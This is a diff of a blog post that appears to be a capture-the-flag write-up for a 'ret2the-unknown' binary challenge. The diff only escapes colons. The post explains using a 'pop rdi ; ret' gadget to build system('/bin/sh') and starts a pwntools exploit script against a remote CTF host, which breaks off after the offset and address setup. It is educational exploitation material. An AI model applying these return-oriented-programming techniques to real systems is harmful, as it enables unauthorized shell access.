SoumyaEXE/soumya.github.io/_posts/2021-07-31-Ret2TheUnknown.markdown

 #### Building system(“/bin/sh”)

 After discovering the addresses of the system() function and /bin/sh string, it follows that the system(“/bin/sh”) call must be built and executed using the aforementioned addresses.
 To do so, it is important to be able to control the RDI register which is used to pass parameters into functions.
-The RDI, RSI, RDX, and RCX registers are all used for that purpose, but they function via a hierarchical basis, in which the parameter passed into a function follows that particular order[[3]](#ftnt3):
+The RDI, RSI, RDX, and RCX registers are all used for that purpose, but they function via a hierarchical basis, in which the parameter passed into a function follows that particular order[[3]](#ftnt3)\:

 some_function(parameter1,parameter2,parameter3,parameter4)

 parameter1 corresponds to RDI, parameter2 corresponds to RSI, and so on.

 Therefore, to pass /bin/sh to system(), it is important to pop the RDI register and pass in the desired parameter value.
-Using the ROPgadget --binary ret2the-unknown command, ROP gadgets that perform the desired pop operation can be found with their respective locations in memory:
+Using the ROPgadget --binary ret2the-unknown command, ROP gadgets that perform the desired pop operation can be found with their respective locations in memory\:

-0x00000000004012a3 : pop rdi ; ret
+0x00000000004012a3 \: pop rdi ; ret

 Exploit
 -------

-Using this gadget, the system() call will contain /bin/sh as its argument, and a shell will be returned:
+Using this gadget, the system() call will contain /bin/sh as its argument, and a shell will be returned\:

 {% highlight python %}
 from pwn import *

 REMOTE = True

-if REMOTE:
+if REMOTE\:
    p = remote("mc.ax",31568)
-else:   p = process("./ret2the-unknown")
+else\:   p = process("./ret2the-unknown")

 rip_offset = 40
 main = 0x0000000000401186